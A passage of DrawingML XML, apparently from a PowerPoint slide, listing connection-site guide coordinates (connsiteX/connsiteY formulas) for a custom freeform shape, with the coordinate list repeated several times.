              <a:gd name="connsiteX35" fmla="*/ 448545 w 1342244"/>
              <a:gd name="connsiteY35" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 455581 w 1342244"/>
              <a:gd name="connsiteY36" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 458312 w 1342244"/>
              <a:gd name="connsiteY37" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 455016 w 1342244"/>
              <a:gd name="connsiteY38" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 456570 w 1342244"/>
              <a:gd name="connsiteY39" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 463479 w 1342244"/>
              <a:gd name="connsiteY40" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 459335 w 1342244"/>
              <a:gd name="connsiteY41" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 474738 w 1342244"/>
              <a:gd name="connsiteY42" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 480641 w 1342244"/>
              <a:gd name="connsiteY43" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 486667 w 1342244"/>
              <a:gd name="connsiteY44" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 484474 w 1342244"/>
              <a:gd name="connsiteY45" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 479954 w 1342244"/>
              <a:gd name="connsiteY46" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 475037 w 1342244"/>
              <a:gd name="connsiteY47" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 471602 w 1342244"/>
              <a:gd name="connsiteY48" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 452255 w 1342244"/>
              <a:gd name="connsiteY49" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 453884 w 1342244"/>
              <a:gd name="connsiteY50" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 441584 w 1342244"/>
              <a:gd name="connsiteY51" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 441309 w 1342244"/>
              <a:gd name="connsiteY52" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 427604 w 1342244"/>
              <a:gd name="connsiteY53" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 433387 w 1342244"/>
              <a:gd name="connsiteY54" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 455981 w 1342244"/>
              <a:gd name="connsiteY55" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 453239 w 1342244"/>
              <a:gd name="connsiteY56" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 454972 w 1342244"/>
              <a:gd name="connsiteY57" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 458715 w 1342244"/>
              <a:gd name="connsiteY58" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 466877 w 1342244"/>
              <a:gd name="connsiteY59" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 474223 w 1342244"/>
              <a:gd name="connsiteY60" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 473519 w 1342244"/>
              <a:gd name="connsiteY61" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 476962 w 1342244"/>
              <a:gd name="connsiteY62" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 484500 w 1342244"/>
              <a:gd name="connsiteY63" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 498392 w 1342244"/>
              <a:gd name="connsiteY64" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 504159 w 1342244"/>
              <a:gd name="connsiteY65" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 480918 w 1342244"/>
              <a:gd name="connsiteY66" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 456326 w 1342244"/>
              <a:gd name="connsiteY67" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 441801 w 1342244"/>
              <a:gd name="connsiteY68" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 416975 w 1342244"/>
              <a:gd name="connsiteY69" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 374255 w 1342244"/>
              <a:gd name="connsiteY70" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 308507 w 1342244"/>
              <a:gd name="connsiteY71" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 279324 w 1342244"/>
              <a:gd name="connsiteY72" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 283394 w 1342244"/>
              <a:gd name="connsiteY73" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 272284 w 1342244"/>
              <a:gd name="connsiteY74" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 274896 w 1342244"/>
              <a:gd name="connsiteY75" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 251225 w 1342244"/>
              <a:gd name="connsiteY76" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 241112 w 1342244"/>
              <a:gd name="connsiteY77" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 225329 w 1342244"/>
              <a:gd name="connsiteY78" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 222787 w 1342244"/>
              <a:gd name="connsiteY79" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 223780 w 1342244"/>
              <a:gd name="connsiteY80" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 196764 w 1342244"/>
              <a:gd name="connsiteY81" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 173321 w 1342244"/>
              <a:gd name="connsiteY82" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 127120 w 1342244"/>
              <a:gd name="connsiteY83" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 99431 w 1342244"/>
              <a:gd name="connsiteY84" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 98557 w 1342244"/>
              <a:gd name="connsiteY85" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 79352 w 1342244"/>
              <a:gd name="connsiteY86" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 85174 w 1342244"/>
              <a:gd name="connsiteY87" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 71259 w 1342244"/>
              <a:gd name="connsiteY88" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 79566 w 1342244"/>
              <a:gd name="connsiteY89" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 85439 w 1342244"/>
              <a:gd name="connsiteY90" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 77721 w 1342244"/>
              <a:gd name="connsiteY91" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 67027 w 1342244"/>
              <a:gd name="connsiteY92" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 55763 w 1342244"/>
              <a:gd name="connsiteY93" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 57219 w 1342244"/>
              <a:gd name="connsiteY94" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 52084 w 1342244"/>
              <a:gd name="connsiteY95" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 21492 w 1342244"/>
              <a:gd name="connsiteY96" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 442 w 1342244"/>
              <a:gd name="connsiteY97" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 0 w 1342244"/>
              <a:gd name="connsiteY98" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 9132 w 1342244"/>
              <a:gd name="connsiteY99" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 2788 w 1342244"/>
              <a:gd name="connsiteY100" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 84 w 1342244"/>
              <a:gd name="connsiteY101" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 3992 w 1342244"/>
              <a:gd name="connsiteY102" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 30116 w 1342244"/>
              <a:gd name="connsiteY103" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 29364 w 1342244"/>
              <a:gd name="connsiteY104" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 29194 w 1342244"/>
              <a:gd name="connsiteY105" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 34887 w 1342244"/>
              <a:gd name="connsiteY106" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 44581 w 1342244"/>
              <a:gd name="connsiteY107" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 43624 w 1342244"/>
              <a:gd name="connsiteY108" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 33909 w 1342244"/>
              <a:gd name="connsiteY109" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY110" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78938 w 1342244"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115531 w 1342244"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 127031 w 1342244"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 151770 w 1342244"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 143794 w 1342244"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 161862 w 1342244"/>
              <a:gd name="connsiteY8" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 228859 w 1342244"/>
              <a:gd name="connsiteY9" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 244546 w 1342244"/>
              <a:gd name="connsiteY10" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 271474 w 1342244"/>
              <a:gd name="connsiteY11" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 263386 w 1342244"/>
              <a:gd name="connsiteY12" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 265826 w 1342244"/>
              <a:gd name="connsiteY13" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 243818 w 1342244"/>
              <a:gd name="connsiteY14" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 242616 w 1342244"/>
              <a:gd name="connsiteY15" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 258031 w 1342244"/>
              <a:gd name="connsiteY16" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 245418 w 1342244"/>
              <a:gd name="connsiteY17" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 230647 w 1342244"/>
              <a:gd name="connsiteY18" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 280159 w 1342244"/>
              <a:gd name="connsiteY19" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 309957 w 1342244"/>
              <a:gd name="connsiteY20" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 319080 w 1342244"/>
              <a:gd name="connsiteY21" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 345956 w 1342244"/>
              <a:gd name="connsiteY22" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 359524 w 1342244"/>
              <a:gd name="connsiteY23" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 375505 w 1342244"/>
              <a:gd name="connsiteY24" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 408998 w 1342244"/>
              <a:gd name="connsiteY25" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 418597 w 1342244"/>
              <a:gd name="connsiteY26" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 429823 w 1342244"/>
              <a:gd name="connsiteY27" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 430843 w 1342244"/>
              <a:gd name="connsiteY28" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 438184 w 1342244"/>
              <a:gd name="connsiteY29" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 441487 w 1342244"/>
              <a:gd name="connsiteY30" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 442471 w 1342244"/>
              <a:gd name="connsiteY31" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 438105 w 1342244"/>
              <a:gd name="connsiteY32" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 444782 w 1342244"/>
              <a:gd name="connsiteY33" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 441715 w 1342244"/>
              <a:gd name="connsiteY34" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 448545 w 1342244"/>
              <a:gd name="connsiteY35" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 455581 w 1342244"/>
              <a:gd name="connsiteY36" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 458312 w 1342244"/>
              <a:gd name="connsiteY37" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 455016 w 1342244"/>
              <a:gd name="connsiteY38" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 456570 w 1342244"/>
              <a:gd name="connsiteY39" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 463479 w 1342244"/>
              <a:gd name="connsiteY40" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 459335 w 1342244"/>
              <a:gd name="connsiteY41" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 474738 w 1342244"/>
              <a:gd name="connsiteY42" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 480641 w 1342244"/>
              <a:gd name="connsiteY43" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 486667 w 1342244"/>
              <a:gd name="connsiteY44" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 484474 w 1342244"/>
              <a:gd name="connsiteY45" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 479954 w 1342244"/>
              <a:gd name="connsiteY46" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 475037 w 1342244"/>
              <a:gd name="connsiteY47" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 471602 w 1342244"/>
              <a:gd name="connsiteY48" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 452255 w 1342244"/>
              <a:gd name="connsiteY49" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 453884 w 1342244"/>
              <a:gd name="connsiteY50" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 441584 w 1342244"/>
              <a:gd name="connsiteY51" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 441309 w 1342244"/>
              <a:gd name="connsiteY52" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 427604 w 1342244"/>
              <a:gd name="connsiteY53" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 433387 w 1342244"/>
              <a:gd name="connsiteY54" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 455981 w 1342244"/>
              <a:gd name="connsiteY55" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 453239 w 1342244"/>
              <a:gd name="connsiteY56" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 454972 w 1342244"/>
              <a:gd name="connsiteY57" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 458715 w 1342244"/>
              <a:gd name="connsiteY58" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 466877 w 1342244"/>
              <a:gd name="connsiteY59" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 474223 w 1342244"/>
              <a:gd name="connsiteY60" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 473519 w 1342244"/>
              <a:gd name="connsiteY61" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 476962 w 1342244"/>
              <a:gd name="connsiteY62" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 484500 w 1342244"/>
              <a:gd name="connsiteY63" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 498392 w 1342244"/>
              <a:gd name="connsiteY64" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 504159 w 1342244"/>
              <a:gd name="connsiteY65" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 480918 w 1342244"/>
              <a:gd name="connsiteY66" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 456326 w 1342244"/>
              <a:gd name="connsiteY67" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 441801 w 1342244"/>
              <a:gd name="connsiteY68" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 416975 w 1342244"/>
              <a:gd name="connsiteY69" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 374255 w 1342244"/>
              <a:gd name="connsiteY70" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 308507 w 1342244"/>
              <a:gd name="connsiteY71" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 279324 w 1342244"/>
              <a:gd name="connsiteY72" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 283394 w 1342244"/>
              <a:gd name="connsiteY73" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 272284 w 1342244"/>
              <a:gd name="connsiteY74" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 274896 w 1342244"/>
              <a:gd name="connsiteY75" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 251225 w 1342244"/>
              <a:gd name="connsiteY76" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 241112 w 1342244"/>
              <a:gd name="connsiteY77" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 225329 w 1342244"/>
              <a:gd name="connsiteY78" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 222787 w 1342244"/>
              <a:gd name="connsiteY79" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 223780 w 1342244"/>
              <a:gd name="connsiteY80" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 196764 w 1342244"/>
              <a:gd name="connsiteY81" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 173321 w 1342244"/>
              <a:gd name="connsiteY82" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 127120 w 1342244"/>
              <a:gd name="connsiteY83" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 99431 w 1342244"/>
              <a:gd name="connsiteY84" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 98557 w 1342244"/>
              <a:gd name="connsiteY85" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 79352 w 1342244"/>
              <a:gd name="connsiteY86" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 85174 w 1342244"/>
              <a:gd name="connsiteY87" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 71259 w 1342244"/>
              <a:gd name="connsiteY88" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 79566 w 1342244"/>
              <a:gd name="connsiteY89" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 85439 w 1342244"/>
              <a:gd name="connsiteY90" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 77721 w 1342244"/>
              <a:gd name="connsiteY91" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 67027 w 1342244"/>
              <a:gd name="connsiteY92" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 55763 w 1342244"/>
              <a:gd name="connsiteY93" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 57219 w 1342244"/>
              <a:gd name="connsiteY94" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 52084 w 1342244"/>
              <a:gd name="connsiteY95" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 21492 w 1342244"/>
              <a:gd name="connsiteY96" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 442 w 1342244"/>
              <a:gd name="connsiteY97" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 0 w 1342244"/>
              <a:gd name="connsiteY98" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 9132 w 1342244"/>
              <a:gd name="connsiteY99" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 2788 w 1342244"/>
              <a:gd name="connsiteY100" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 84 w 1342244"/>
              <a:gd name="connsiteY101" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 3992 w 1342244"/>
              <a:gd name="connsiteY102" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 30116 w 1342244"/>
              <a:gd name="connsiteY103" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 29364 w 1342244"/>
              <a:gd name="connsiteY104" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 29194 w 1342244"/>
              <a:gd name="connsiteY105" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 34887 w 1342244"/>
              <a:gd name="connsiteY106" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 44581 w 1342244"/>
              <a:gd name="connsiteY107" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 43624 w 1342244"/>
              <a:gd name="connsiteY108" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 33909 w 1342244"/>
              <a:gd name="connsiteY109" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY110" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78938 w 1342244"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115531 w 1342244"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 127031 w 1342244"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 151770 w 1342244"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 143794 w 1342244"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 161862 w 1342244"/>
              <a:gd name="connsiteY8" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 228859 w 1342244"/>
              <a:gd name="connsiteY9" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 244546 w 1342244"/>
              <a:gd name="connsiteY10" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 271474 w 1342244"/>
              <a:gd name="connsiteY11" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 263386 w 1342244"/>
              <a:gd name="connsiteY12" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 265826 w 1342244"/>
              <a:gd name="connsiteY13" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 243818 w 1342244"/>
              <a:gd name="connsiteY14" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 242616 w 1342244"/>
              <a:gd name="connsiteY15" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 258031 w 1342244"/>
              <a:gd name="connsiteY16" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 245418 w 1342244"/>
              <a:gd name="connsiteY17" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 230647 w 1342244"/>
              <a:gd name="connsiteY18" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 280159 w 1342244"/>
              <a:gd name="connsiteY19" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 309957 w 1342244"/>
              <a:gd name="connsiteY20" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 319080 w 1342244"/>
              <a:gd name="connsiteY21" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 345956 w 1342244"/>
              <a:gd name="connsiteY22" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 359524 w 1342244"/>
              <a:gd name="connsiteY23" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 375505 w 1342244"/>
